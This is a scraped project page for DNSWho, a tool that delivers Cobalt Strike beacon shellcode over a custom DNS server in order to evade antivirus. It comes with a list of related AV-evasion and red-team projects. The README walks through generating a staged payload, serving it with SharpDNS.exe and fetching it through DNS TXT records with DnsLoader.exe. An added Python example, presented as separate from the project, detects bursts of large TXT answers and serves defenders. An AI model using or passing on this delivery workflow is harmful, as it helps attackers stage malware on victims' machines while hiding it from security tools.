OlivierLaflamme / DNSWho

Licence: other
transmit cs beacon (shellcode) over self-made dns to avoid anti-kill and AV

Projects that are alternatives of or similar to DNSWho

MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+725.53%)
Mutual labels:  evasion, bypass-antivirus, antivirus-evasion, redteam
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+6402.13%)
Mutual labels:  bypass-av, bypass-antivirus, antivirus-evasion
trolo
trolo - an easy to use script for generating Payloads that bypasses antivirus
Stars: ✭ 45 (-4.26%)
Mutual labels:  bypass-av, bypass-antivirus
GolangBypassAV
Research on using Golang in various ways to bypass AV
Stars: ✭ 530 (+1027.66%)
Mutual labels:  bypass-av, bypass-antivirus
ScareCrow-CobaltStrike
Cobalt Strike script for ScareCrow payloads integration (EDR/AV evasion)
Stars: ✭ 387 (+723.4%)
Mutual labels:  evasion, bypass-antivirus
DInvoke shellcodeload CSharp
ShellCodeLoader via DInvoke
Stars: ✭ 41 (-12.77%)
Mutual labels:  bypass-antivirus, redteam
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (+87.23%)
Mutual labels:  exfiltration, redteam
Evader
Packer (actually a crypter) for antivirus evasion implemented for windows PE files (BSc-Thesis)
Stars: ✭ 86 (+82.98%)
Mutual labels:  evasion, antivirus-evasion
Pezor
Open-Source PE Packer
Stars: ✭ 561 (+1093.62%)
Mutual labels:  antivirus-evasion, redteam
Xeexe Topantivirusevasion
Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender, Malwarebytes, Avast, ESET-NOD32, AVG,... & Automatically Add ICON and MANIFEST to executable
Stars: ✭ 387 (+723.4%)
Mutual labels:  evasion, antivirus-evasion
Hacktheworld
A Python Script For Generating Payloads that Bypasses All Antivirus so far.
Stars: ✭ 527 (+1021.28%)
Mutual labels:  evasion, antivirus-evasion
certexfil
Exfiltration based on custom X509 certificates
Stars: ✭ 18 (-61.7%)
Mutual labels:  exfiltration, redteam
NewNtdllBypassInlineHook CSharp
Load a fresh new copy of ntdll.dll via file mapping to bypass API inline hook.
Stars: ✭ 35 (-25.53%)
Mutual labels:  bypass-antivirus, redteam
Gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Stars: ✭ 6,030 (+12729.79%)
Mutual labels:  exfiltration, redteam
HellgateLoader CSharp
Load shellcode via HELLGATE, Rewrite hellgate with .net framework for learning purpose.
Stars: ✭ 73 (+55.32%)
Mutual labels:  bypass-antivirus, redteam
Cobalt Arsenal
My collection of battle-tested Aggressor Scripts for Cobalt Strike 4.0+
Stars: ✭ 230 (+389.36%)
Mutual labels:  beacon, redteam
AggressiveGadgetToJScript
A Cobalt Strike Aggressor script to generate GadgetToJScript payloads
Stars: ✭ 90 (+91.49%)
Mutual labels:  redteam, cobaltstrike
Foureye
AV Evasion Tool For Red Team Ops
Stars: ✭ 421 (+795.74%)
Mutual labels:  antivirus-evasion, redteam
URL-obfuscator
Python Program to obfuscate URLs to make Phishing attacks more difficult to detect. Uses Active open redirect list and other URL obfuscation techniques.
Stars: ✭ 101 (+114.89%)
Mutual labels:  evasion, bypass-antivirus
Bof Regsave
Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File
Stars: ✭ 85 (+80.85%)
Mutual labels:  beacon, redteam

DNSWho

DNS server implementation: SharpDNS.exe
"Client" implementation: DnsLoader.exe

Compared with HTTP, the DNS protocol offers better concealment. By analogy with the DNS beacon of Cobalt Strike (cs), we can implement our own DNS server to transmit shellcode. C# has an excellent third-party library, ARSoft.Tools.Net, which we can use both for DNS queries and for a self-built DNS server.

Create a new .NET 4.0 console project and install ARSoft.Tools.Net. Because of the .NET version constraint, we need to install an older version of ARSoft.Tools.Net:

Install-Package ARSoft.Tools.Net -Version 1.8.2

Next, generate a raw cs payload. If you are smart you won't make it stageless, because it will be way too big.

Then spin up the DNS server and make sure that the length shown in Wireshark is the same as the one displayed in the terminal:

SharpDNS.exe beacon.bin

The output will look like the following:

image

image

Then simply catch it:

DnsLoader.exe <DNS> <CDN> 2000

Note that a DNS TXT response cannot carry too much data at a time; the value of 2000 used in my test works without problems.
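
Seen from the monitoring side, the transfer described above appears as a short burst of unusually large TXT answers from one server to one client. The detection logic below is an added example and not part of DNSWho; the log format, field names and thresholds are assumptions, and the sample records are constructed.

```python
from collections import defaultdict

# Constructed sample records in a hypothetical log format (not project output):
# epoch client_ip server_ip qtype qname answer_bytes
SAMPLE_LOG = """\
1700000000 10.0.0.5 10.0.0.53 A www.example.com 16
1700000002 10.0.0.5 10.0.0.53 TXT example.com 180
1700000010 10.0.0.7 203.0.113.9 TXT a.stage.example.net 2000
1700000011 10.0.0.7 203.0.113.9 TXT b.stage.example.net 2000
1700000012 10.0.0.7 203.0.113.9 TXT c.stage.example.net 2000
1700000013 10.0.0.7 203.0.113.9 TXT d.stage.example.net 2000
1700000014 10.0.0.7 203.0.113.9 TXT e.stage.example.net 1200
1700003000 10.0.0.8 10.0.0.53 TXT selector1._domainkey.example.org 410
"""

LARGE_TXT = 512      # bytes; larger than a classic DNS-over-UDP message
WINDOW = 60          # seconds
MIN_RESPONSES = 4    # large TXT answers needed inside one window
MIN_TOTAL = 4096     # total bytes needed inside one window

def parse(log):
    """Yield (epoch, client, server, qtype, qname, size) per valid line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 6 or not parts[0].isdigit() or not parts[5].isdigit():
            continue  # skip malformed lines instead of failing the whole run
        yield int(parts[0]), parts[1], parts[2], parts[3].upper(), parts[4], int(parts[5])

def find_txt_staging(log):
    """Return one alert per client/server pair with a burst of large TXT answers."""
    by_pair = defaultdict(list)
    for ts, client, server, qtype, _qname, size in parse(log):
        if qtype == "TXT" and size >= LARGE_TXT:
            by_pair[(client, server)].append((ts, size))
    alerts = []
    for (client, server), events in sorted(by_pair.items()):
        events.sort()
        start = total = 0
        for end, (ts, size) in enumerate(events):
            total += size
            while ts - events[start][0] > WINDOW:  # slide the window forward
                total -= events[start][1]
                start += 1
            count = end - start + 1
            if count >= MIN_RESPONSES and total >= MIN_TOTAL:
                alerts.append({"client": client, "server": server,
                               "responses": count, "bytes": total})
                break  # one alert per pair is enough
    return alerts
```

Tune the thresholds against your own baseline; ordinary SPF, DKIM and DMARC lookups are usually single, small TXT answers and stay below them.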

Tada...

image


Having Issues?

If you get the following error, this is because you're not running this on the same machine as your DNS. That is because svchost.exe listens on UDP 53.

image

Additionally, don't try to change the port for the DnsServer, because you can't:

image

image
